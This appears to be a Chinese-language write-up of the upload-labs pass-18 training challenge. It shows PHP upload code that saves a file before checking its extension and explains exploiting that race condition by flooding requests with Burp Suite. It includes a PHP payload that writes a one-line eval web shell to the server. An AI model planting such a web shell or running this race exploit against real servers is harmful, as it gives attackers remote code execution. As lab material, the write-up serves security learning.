upload-labs:pass-18

 

 告诉我需要代码审计。

OK，打开源码看看。

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件！";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错！';
    }
}

我传了个图片马，是OK的。

当然，这里的正解是条件竞争，当然也上网搜了一下。条件竞争大概意思就是：

当我们上传一个文件后，文件会先上传到服务器，（主要是文件先被传到服务器上了）然后再判断该文件类型是否含在白名单中(jpg、png、gif)，如果是，则会将该文件重命名后放在服务器中，如果不是，则会将该文件删除掉。那么我们可以知道，文件是先被上传到了服务器，而后才做判断之类的一系列操作，这样就存在条件竞争漏洞。
这个漏洞的利用方式可以有python还有burpsuite发包攻击。原理都是持续不断地发包，超过服务器处理速度，在服务器判断的间隙，完成我们想要完成的操作。

利用burpsuite不断向发包

文件的内容可以是：

<?php
$myfile = fopen("18.php", "w");
$txt='<?php @eval($_POST[\'shell\']);?>';
fwrite($myfile,$txt);
fclose($myfile);
?>

然后不断访问这个文件，只要一次成功，后端就被创建了一个PHP一句话木马文件。